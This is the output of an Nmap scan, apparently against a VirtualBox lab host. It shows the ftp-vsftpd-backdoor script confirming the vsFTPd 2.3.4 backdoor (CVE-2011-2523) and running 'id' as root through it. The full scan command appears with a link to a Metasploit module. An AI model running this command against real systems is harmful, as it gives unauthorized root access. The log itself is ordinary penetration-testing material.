# Nmap 7.99 scan initiated Fri Jul 10 22:57:48 2026 as: /usr/lib/nmap/nmap --privileged -p 21 --script ftp-vsftpd-backdoor -oN vuln_scan.txt 10.0.2.3
Nmap scan report for 10.0.2.3
Host is up (0.00058s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2011-2523  BID:48539
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|       https://www.securityfocus.com/bid/48539
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
MAC Address: 08:00:27:FA:6C:4E (Oracle VirtualBox virtual NIC)

# Nmap done at Fri Jul 10 22:57:51 2026 -- 1 IP address (1 host up) scanned in 3.05 seconds
